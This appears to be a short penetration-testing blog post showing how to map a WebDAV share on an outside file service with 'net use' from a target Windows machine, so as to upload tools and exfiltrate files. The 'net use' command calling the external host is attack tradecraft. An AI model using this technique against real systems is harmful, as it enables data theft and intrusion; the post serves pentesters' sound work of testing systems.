The lack of native commands for simple downloading of pentesting tools in Windows is often bemoaned, especially in comparison to linux where commands like wget are generally installed and easy to use.#
The first port of call is to use Powershell but that isn’t always possible in earlier version of Windows, and I’ve been told you cannot do it easily via Windows command line.
It turns it out it’s pretty simple if you do it via webdav. First you need to set up webdav on a server somewhere. You can set up webdav on your Kali machine using widely available instructions. Here I used a free web-based file service called Opendrive.
Set up a free Opendrive account and move your tools into the Documents folder as per their instructions and note the username and password of course.
Now on the target Windows box use the following commands:
net use * https://webdav.opendrive.com/Documents/ password1234 /USER:neil@neilsec.com
Windows will report back that it has mapped a drive such as Z: to this webdav share.
Now you can copy files to and from the Z: at will making it a snap to upload tools or exfiltrate files.
When you’re finished: net use Z: /DELETE will tidy up for you.
Leave a Reply